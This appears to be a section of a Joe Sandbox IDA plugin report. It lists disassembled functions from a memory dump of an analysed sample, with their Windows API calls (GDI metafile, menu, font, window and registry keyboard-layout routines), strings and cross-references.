Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004225B6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042265A
MulDiv.KERNEL32(?,000009EC,00000000,?), ref: 00422677
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226A3
GetEnhMetaFileHeader.GDI32(00000016,00000064,?), ref: 004226C3
DeleteEnhMetaFile.GDI32(00000016,?,000009EC,00000000,?,000009EC,00000000), ref: 004226E4
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226F7

Strings

`, xrefs: 0042263F

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004225B8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122

APIs

MulDiv.KERNEL32(?,000009EC,00000000), ref: 0042265A
MulDiv.KERNEL32(?,000009EC,00000000,?), ref: 00422677
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226A3
GetEnhMetaFileHeader.GDI32(00000016,00000064,?), ref: 004226C3
DeleteEnhMetaFile.GDI32(00000016,?,000009EC,00000000,?,000009EC,00000000), ref: 004226E4
SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008), ref: 004226F7

Strings

`, xrefs: 0042263F

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0041B680, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 89

APIs

GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B689
GetCurrentThreadId.KERNEL32(?,?,00000000), ref: 0041B698
RtlEnterCriticalSection.KERNEL32(00464A04,?,?,00000000), ref: 0041B6D3
SetEvent.KERNEL32(?,?,00464A04,?,?,00000000), ref: 0041B767
RtlLeaveCriticalSection.KERNEL32(00464A04,0041B7A1,00464A04,?,?,00000000), ref: 0041B790

Strings

H#A, xrefs: 0041B6B2
0@F, xrefs: 0041B68E

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00426864, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004268BC
GetSystemMetrics.USER32(00000000), ref: 004268D1
GetSystemMetrics.USER32(00000001), ref: 004268DC
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426906

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

dhB, xrefs: 00426881, 0042688E, 00426895
DISPLAY, xrefs: 004268FD
GetMonitorInfoW, xrefs: 0042687C

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004266BC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68

APIs

GetMonitorInfoA.USER32(?,?), ref: 004266ED
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00426714
GetSystemMetrics.USER32(00000000), ref: 00426729
GetSystemMetrics.USER32(00000001), ref: 00426734
lstrcpy.KERNEL32(?,DISPLAY), ref: 0042675E

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

DISPLAY, xrefs: 00426755
GetMonitorInfo, xrefs: 004266D4

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00401B18, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62

APIs

RtlEnterCriticalSection.KERNEL32(004645C4,00000000,i ), ref: 00401B45
LocalFree.KERNEL32 ref: 00401B57
VirtualFree.KERNEL32(?,00000000,00008000,0019BBB0,00000000,i ), ref: 00401B76
LocalFree.KERNEL32 ref: 00401BB5
RtlLeaveCriticalSection.KERNEL32(004645C4,00401BF5,0019BBB0,00000000,i ), ref: 00401BDE
RtlDeleteCriticalSection.KERNEL32(004645C4,00401BF5,0019BBB0,00000000,i ), ref: 00401BE8

Strings

i , xrefs: 00401B2C

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004040B8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0045BD1C,00000000,?,00404186,?,?,?,00000001,00404226,00402817,0040285F,?,00000000), ref: 004040F1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0045BD1C), ref: 004040F7
GetStdHandle.KERNEL32(000000F5,00404140,00000002,0045BD1C,00000000,00000000,?,00404186,?,?,?,00000001,00404226,00402817,0040285F), ref: 0040410C
WriteFile.KERNEL32(00000000,000000F5,00404140,00000002,0045BD1C), ref: 00404112
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404130

Strings

Error, xrefs: 00404124
Runtime error at 00000000, xrefs: 004040EA, 00404129

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00444488, Relevance: 12.2, APIs: 8, Instructions: 170

APIs

6D37D9B4.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 004444E7

Part of subcall function 0041F654: FillRect.USER32(?,00000000,00000000), ref: 0041F67C

6D37D9B4.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00444588
SetTextColor.GDI32(00000000,00FFFFFF), ref: 004445D5
SetBkColor.GDI32(00000000,00000000), ref: 004445DD
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 00444602
SetTextColor.GDI32(00000000,00FFFFFF), ref: 00444623
SetBkColor.GDI32(00000000,00000000), ref: 0044462B
BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 0044464E

Part of subcall function 00444460: 6D384419.COMCTL32(00000000,?,004444C1,00000000,?), ref: 00444476

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0042ECEC, Relevance: 12.1, APIs: 8, Instructions: 146

APIs

GetDC.USER32(00000000), ref: 0042ED16

Part of subcall function 0041EAB0: CreateFontIndirectA.GDI32(?), ref: 0041EBEE

SelectObject.GDI32(00000000,00000000), ref: 0042ED27
GetTextMetricsA.GDI32(00000000,?), ref: 0042ED33
SelectObject.GDI32(00000000,00000000), ref: 0042ED3A
ReleaseDC.USER32(00000000,00000000), ref: 0042ED42
BeginDeferWindowPos.USER32(00000000), ref: 0042ED9A
DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042EE41
EndDeferWindowPos.USER32(?), ref: 0042EE6F

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00453978, Relevance: 12.1, APIs: 8, Instructions: 138

APIs

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

GetCapture.USER32(00000000,00453C08), ref: 004539EE
GetCapture.USER32(0000001F,00000000,00000000,00000000,00453C08), ref: 004539FD
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00453A03
ReleaseCapture.USER32 ref: 00453A08
GetActiveWindow.USER32 ref: 00453A17

Part of subcall function 00454DE0: GetCursorPos.USER32 ref: 00454DFB
Part of subcall function 00454DE0: WindowFromPoint.USER32(?,?), ref: 00454E08
Part of subcall function 00454DE0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00454E16
Part of subcall function 00454DE0: GetCurrentThreadId.KERNEL32(00000000,00000000,?,?), ref: 00454E1D
Part of subcall function 00454DE0: SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 00454E36
Part of subcall function 00454DE0: SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00454E4D
Part of subcall function 00454DE0: SetCursor.USER32(00000000), ref: 00454E5F

Part of subcall function 0044DD8C: GetCurrentThreadId.KERNEL32(0044DD3C,00000000,00000000,0044DDF8,?,00000000,0044DE2F), ref: 0044DDDB
Part of subcall function 0044DD8C: EnumThreadWindows.USER32(00000000,0044DD3C,00000000), ref: 0044DDE1

SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00453AAD
SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00453B14
GetActiveWindow.USER32 ref: 00453B23

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043B768, Relevance: 12.1, APIs: 8, Instructions: 123

APIs

SaveDC.GDI32 ref: 0043B77E

Part of subcall function 004358CC: GetWindowOrgEx.GDI32(?), ref: 004358DA
Part of subcall function 004358CC: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004358F0

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B79F
GetWindowLongA.USER32(00000000,000000EC), ref: 0043B7B5
GetWindowLongA.USER32(00000000,000000F0), ref: 0043B7D7

Part of subcall function 0043B768: SetRect.USER32(?,00000000,00000000,?,?), ref: 0043B803
Part of subcall function 0043B768: DrawEdge.USER32(?,?,?,00000000), ref: 0043B812
Part of subcall function 0043B768: IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043B837

RestoreDC.GDI32(?,?), ref: 0043B8A8

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00420380, Relevance: 12.1, APIs: 8, Instructions: 79

APIs

GetDC.USER32(00000000), ref: 004203AE
GetDeviceCaps.GDI32(?,00000068), ref: 004203CA
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004203E9
GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 0042040D
GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 0042042B
GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0042043F
GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0042045F
ReleaseDC.USER32(00000000,?), ref: 00420477

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0044AB04, Relevance: 10.9, APIs: 7, Instructions: 405

APIs

DefWindowProcA.USER32(?,?,?,?), ref: 0044B019

Part of subcall function 00449EB0: SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00449F36
Part of subcall function 00449EB0: DrawMenuBar.USER32(00000000), ref: 00449F47

GetSubMenu.USER32(?,?), ref: 0044AC00

Part of subcall function 0041F3B8: RtlInitializeCriticalSection.KERNEL32(00422DBC,00422D84,?,00000001,00422F1A,?,?,?,00424185,?,?,00423FA5,?,0000000E,00000000,?), ref: 0041F3D8

SaveDC.GDI32(?), ref: 0044ADD3
RestoreDC.GDI32(?,?), ref: 0044AE47
GetWindowDC.USER32(?), ref: 0044AEC1
SaveDC.GDI32(?), ref: 0044AEF8
RestoreDC.GDI32(?,?), ref: 0044AF65

Part of subcall function 0044A6F4: GetMenuItemCount.USER32(?), ref: 0044A720
Part of subcall function 0044A6F4: GetMenuState.USER32(?,00000000,00000400), ref: 0044A740
Part of subcall function 0044A6F4: GetMenuState.USER32(?,00000000,00000400), ref: 0044A7D7

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00446B64, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187

APIs

GetVersion.KERNEL32(00000000,00446DBF), ref: 00446C00
InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00446D10
InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 00446D9C

Part of subcall function 00447068: CreatePopupMenu.USER32(?,00446D7B,00000000,00000000,00446DBF), ref: 00447083
Part of subcall function 00447068: CreateMenu.USER32 ref: 0044708D

InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 00446D83

Strings

,, xrefs: 00446C14
?, xrefs: 00446C1B

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00420970, Relevance: 10.7, APIs: 7, Instructions: 166

APIs

Part of subcall function 00420628: GetDC.USER32(00000000), ref: 00420672
Part of subcall function 00420628: CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 004206B9
Part of subcall function 00420628: DeleteObject.GDI32(?), ref: 004206F4

GetObjectA.GDI32(?,00000018,?), ref: 00420A62
GetObjectA.GDI32(?,00000018,?), ref: 00420A71
GetBitmapBits.GDI32(?,?,?,00000000,00420B34,?,?,?,00000018,?,?,00000018,?,?), ref: 00420AC2
GetBitmapBits.GDI32(?,?,?,?,?,?,00000000,00420B34,?,?,?,00000018,?,?,00000018,?), ref: 00420AD0
DeleteObject.GDI32(?), ref: 00420AD9
DeleteObject.GDI32(?), ref: 00420AE2
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 00420B04

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043EBD8, Relevance: 10.7, APIs: 7, Instructions: 151

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010), ref: 0043ECBD
GetTickCount.KERNEL32(00000000,000000FF,?,?,?,?,00000010,00000000,0043ED9F), ref: 0043ECC2
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043ECFD
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043ED15

Part of subcall function 00441E2C: GetCursorPos.USER32(?), ref: 00441E30

AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043ED5B
ShowWindow.USER32(00000000,00000004), ref: 0043ED6C
GetTickCount.KERNEL32(0043EDA6), ref: 0043ED86

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00454B30, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125

APIs

GetKeyboardLayoutList.USER32(00000040,?), ref: 00454B86
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00454BEE
RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,00454C97,?,80000002,00000000), ref: 00454C28
RegCloseKey.ADVAPI32(?,00454C9E,00000000,?,00000100,00000000,00454C97,?,80000002,00000000), ref: 00454C91

Strings

System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00454BD8
layout text, xrefs: 00454C1F

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00422B38, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99

APIs

MulDiv.KERNEL32(?,?,000009EC), ref: 00422B8A
MulDiv.KERNEL32(?,?,000009EC,?), ref: 00422BA1
GetDC.USER32(00000000), ref: 00422BB8
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?), ref: 00422BDC
GetWinMetaFileBits.GDI32(?,?,?,00000008,?), ref: 00422C0F

Part of subcall function 0041FD98: GetLastError.KERNEL32(00000000,0041FE34), ref: 0041FDB8
Part of subcall function 0041FD98: FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,0041FE34), ref: 0041FDDE

Strings

`, xrefs: 00422B70

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00454E70, Relevance: 10.6, APIs: 7, Instructions: 89

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454EC4
CreateFontIndirectA.GDI32(?), ref: 00454ED1
GetStockObject.GDI32(0000000D), ref: 00454EE7
SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454F10
CreateFontIndirectA.GDI32(?), ref: 00454F20
CreateFontIndirectA.GDI32(?), ref: 00454F39

Part of subcall function 0041ED3C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041ED49

GetStockObject.GDI32(0000000D), ref: 00454F5F

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043EEE4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73

APIs

6D37908C.COMCTL32(00000000), ref: 0043EF16

Part of subcall function 004262C8: 6D3D6ED3.COMCTL32(*PC,000000FF,00000000,0043EF46,00000000,0043EFA4,?,00000000), ref: 004262CC

6D3D6C74.COMCTL32(*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF6A
6D3D6CC8.COMCTL32(00000000,?,*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF75
6D3D6C74.COMCTL32(*PC,00000001,?,0043F00D,00000000,?,*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF88
6D377CF1.COMCTL32(*PC,0043EFAB,0043F00D,00000000,?,*PC,00000000,00000000,00000000,00000000,0043EFA4,?,00000000), ref: 0043EF9E

Strings

*PC, xrefs: 0043EF3E, 0043EF58, 0043EF66, 0043EF84, 0043EF9A, 0043EF69, 0043EF87, 0043EF9D

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00426790, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004267E8
GetSystemMetrics.USER32(00000000), ref: 004267FD
GetSystemMetrics.USER32(00000001), ref: 00426808
lstrcpy.KERNEL32(?,DISPLAY), ref: 00426832

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

DISPLAY, xrefs: 00426829
GetMonitorInfoA, xrefs: 004267A8

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004231BC, Relevance: 10.6, APIs: 7, Instructions: 66

APIs

Part of subcall function 004205D4: GetObjectA.GDI32(?,00000004), ref: 004205EB
Part of subcall function 004205D4: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042060E

GetDC.USER32(00000000), ref: 004231FA
CreateCompatibleDC.GDI32(?), ref: 00423206
SelectObject.GDI32(?), ref: 00423213
